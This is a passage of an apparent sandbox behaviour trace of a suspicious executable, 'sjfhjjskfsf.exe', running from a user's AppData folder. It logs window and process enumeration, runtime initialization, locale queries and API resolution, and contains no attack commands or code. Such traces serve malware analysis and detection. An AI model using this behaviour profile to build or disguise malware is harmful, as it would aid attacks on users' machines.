out: lpdwProcessId=0x18a0ec) returned 0x50c [0134.476] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x468 [0134.476] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x544 [0134.476] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x76c [0134.476] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x584 [0134.476] GetWindowThreadProcessId (in: hWnd=0x20024, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7ec [0134.476] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4d8 [0134.476] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x7d4 [0134.477] GetWindowThreadProcessId (in: hWnd=0x10104, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0134.477] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0134.477] EnumWindows (lpEnumFunc=0x4c50a5e, lParam=0x0) [0134.477] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.477] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.477] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.478] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.478] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.478] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.478] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.478] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.478] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.478] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.478] GetWindowThreadProcessId (in: hWnd=0x400ac, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.478] GetWindowThreadProcessId (in: hWnd=0x300d6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.478] GetWindowThreadProcessId (in: hWnd=0x300c0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.478] GetWindowThreadProcessId (in: hWnd=0x1013c, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x50c [0134.479] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x5a4 [0134.479] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x45c [0134.479] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.479] GetWindowThreadProcessId (in: hWnd=0x10270, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x1c4 [0134.479] GetWindowThreadProcessId (in: hWnd=0x302ae, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xf54 [0134.479] GetWindowThreadProcessId (in: hWnd=0x402f4, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xec8 [0134.479] GetWindowThreadProcessId (in: hWnd=0x402ec, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xec8 [0134.479] GetWindowThreadProcessId (in: hWnd=0x402f2, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xec8 [0134.479] GetWindowThreadProcessId (in: hWnd=0x102d8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xc08 [0134.479] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xd54 [0134.479] GetWindowThreadProcessId (in: hWnd=0x1026a, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xb44 [0134.480] GetWindowThreadProcessId (in: hWnd=0x20278, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x1c4 [0134.480] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x1c4 [0134.480] GetWindowThreadProcessId (in: hWnd=0x600a8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x1c4 [0134.480] GetWindowThreadProcessId (in: hWnd=0x900a0, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.480] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0xa98 [0134.480] GetWindowThreadProcessId (in: hWnd=0x300be, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.480] GetWindowThreadProcessId (in: hWnd=0x60150, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.480] GetWindowThreadProcessId (in: hWnd=0x400ea, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.480] GetWindowThreadProcessId (in: hWnd=0x300c8, lpdwProcessId=0x18a0ec | out: lpdwProcessId=0x18a0ec) returned 0x4c4 [0134.481] IsWindowVisible (hWnd=0x1018a) returned 0 [0134.482] IsWindowVisible (hWnd=0x10208) returned 0 [0134.482] IsWindowVisible (hWnd=0x10238) returned 0 [0134.483] IsWindowVisible (hWnd=0x10244) returned 0 [0134.483] IsWindowVisible (hWnd=0x101d4) returned 0 [0134.484] IsWindowVisible (hWnd=0x302ae) returned 0 [0134.486] IsWindowVisible (hWnd=0x1025c) returned 1 [0134.486] GetWindowTextLengthW (hWnd=0x1025c) returned 6 [0134.486] GetWindowTextW (in: hWnd=0x1025c, lpString=0x18a164, nMaxCount=12 | out: lpString="Member") returned 6 Thread: id = 78 os_tid = 0xed8 Thread: id = 79 os_tid = 0xedc [0110.377] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Thread: id = 80 os_tid = 0xee0 Thread: id = 81 os_tid = 0xefc Thread: id = 82 os_tid = 0xf00 Thread: id = 83 os_tid = 0xf04 Thread: id = 84 os_tid = 0xf08 [0127.850] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0127.862] ResetEvent (hEvent=0x244) returned 1 Thread: id = 85 os_tid = 0xf10 Thread: id = 86 os_tid = 0xf14 Thread: id = 145 os_tid = 0xf2c Thread: id = 147 os_tid = 0xf4c Thread: id = 148 os_tid = 0xf50 Thread: id = 149 os_tid = 0xf54 [0134.176] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0134.178] SetConsoleCtrlHandler (HandlerRoutine=0x4c509e6, Add=1) returned 1 [0134.178] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0134.179] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0134.180] GetClassInfoW (in: hInstance=0x400000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.5c39d4.0", lpWndClass=0x26d62ac | out: lpWndClass=0x26d62ac) returned 0 [0134.182] CoTaskMemAlloc (cb=0x56) returned 0x4b23ef8 [0134.182] RegisterClassW (lpWndClass=0x5c8f804) returned 0xc1c7 [0134.182] CoTaskMemFree (pv=0x4b23ef8) [0134.183] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.5c39d4.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.5c39d4.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x302ae [0134.186] NtdllDefWindowProc_W () returned 0x0 [0134.186] NtdllDefWindowProc_W () returned 0x0 [0134.186] NtdllDefWindowProc_W () returned 0x0 [0134.186] NtdllDefWindowProc_W () returned 0x0 [0134.186] SetEvent (hEvent=0x430) returned 1 [0134.300] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0134.322] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0134.437] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0134.451] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) Process: id = "8" image_name = "sjfhjjskfsf.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe" page_root = "0x1f6fc000" os_pid = "0xec4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xeb0" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\" 2 3772 18150712" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "32" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f18d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 57 os_tid = 0xec8 [0100.052] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0100.052] GetKeyboardType (nTypeFlag=0) returned 4 [0100.052] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\" 2 3772 18150712" [0100.052] GetStartupInfoA (in: lpStartupInfo=0x18fefc | out: lpStartupInfo=0x18fefc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0100.052] GetVersion () returned 0x1db10106 [0100.052] GetVersion () returned 0x1db10106 [0100.052] GetCurrentThreadId () returned 0xec8 [0100.052] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9f8, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0100.123] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f8d3, nSize=0x105 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0100.124] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0100.124] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0100.124] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e8 | out: phkResult=0x18f9e8*=0x0) returned 0x2 [0100.124] lstrcpynA (in: lpString1=0x18f8d3, lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe", iMaxLength=261 | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" [0100.124] GetThreadLocale () returned 0x409 [0100.124] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f9e3, cchData=5 | out: lpLCData="ENU") returned 4 [0100.125] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe") returned 57 [0100.125] lstrcpynA (in: lpString1=0x18f909, lpString2="ENU", iMaxLength=207 | out: lpString1="ENU") returned="ENU" [0100.125] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0100.126] lstrcpynA (in: lpString1=0x18f909, lpString2="EN", iMaxLength=207 | out: lpString1="EN") returned="EN" [0100.126] LoadLibraryExA (lpLibFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0100.126] LoadStringA (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0100.126] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x6874b8 [0100.126] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x4f0000 [0100.126] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x6884b8 [0100.126] VirtualAlloc (lpAddress=0x4f0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4f0000 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffdb, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffef, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffe9, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffea, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18fb1c, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0100.127] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18fb08, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0100.127] GetVersionExA (in: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fea0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0100.128] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75b90000 [0100.128] GetProcAddress (hModule=0x75b90000, lpProcName="GetDiskFreeSpaceExA") returned 0x75c2434f [0100.128] GetThreadLocale () returned 0x409 [0100.128] GetThreadLocale () returned 0x409 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jan") returned 4 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd78, cchData=256 | out: lpLCData="January") returned 8 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Feb") returned 4 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd78, cchData=256 | out: lpLCData="February") returned 9 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mar") returned 4 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="March") returned 6 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Apr") returned 4 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="April") returned 6 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="May") returned 4 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jun") returned 4 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="June") returned 5 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Jul") returned 4 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="July") returned 5 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Aug") returned 4 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="August") returned 7 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sep") returned 4 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd78, cchData=256 | out: lpLCData="September") returned 10 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Oct") returned 4 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd78, cchData=256 | out: lpLCData="October") returned 8 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Nov") returned 4 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd78, cchData=256 | out: lpLCData="November") returned 9 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Dec") returned 4 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd78, cchData=256 | out: lpLCData="December") returned 9 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sun") returned 4 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sunday") returned 7 [0100.128] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Mon") returned 4 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Monday") returned 7 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tue") returned 4 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Tuesday") returned 8 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wed") returned 4 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Wednesday") returned 10 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thu") returned 4 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Thursday") returned 9 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Fri") returned 4 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Friday") returned 7 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sat") returned 4 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Saturday") returned 9 [0100.129] GetThreadLocale () returned 0x409 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="$") returned 2 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fecc, cchData=2 | out: lpLCData=".") returned 2 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="2") returned 2 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fecc, cchData=2 | out: lpLCData="/") returned 2 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0100.129] GetThreadLocale () returned 0x409 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0100.129] GetThreadLocale () returned 0x409 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fecc, cchData=2 | out: lpLCData=":") returned 2 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="AM") returned 3 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="PM") returned 3 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0100.129] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0100.129] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x75e60000 [0100.129] GetProcAddress (hModule=0x75e60000, lpProcName="VariantChangeTypeEx") returned 0x75e64c28 [0100.130] GetProcAddress (hModule=0x75e60000, lpProcName="VarNeg") returned 0x75edc802 [0100.130] GetProcAddress (hModule=0x75e60000, lpProcName="VarNot") returned 0x75edec66 [0100.130] GetProcAddress (hModule=0x75e60000, lpProcName="VarAdd") returned 0x75e85934 [0100.130] GetProcAddress (hModule=0x75e60000, lpProcName="VarSub") returned 0x75edd332 [0100.130] GetProcAddress (hModule=0x75e60000, lpProcName="VarMul") returned 0x75eddbd4 [0100.130] GetProcAddress (hModule=0x75e60000, lpProcName="VarDiv") returned 0x75ede405 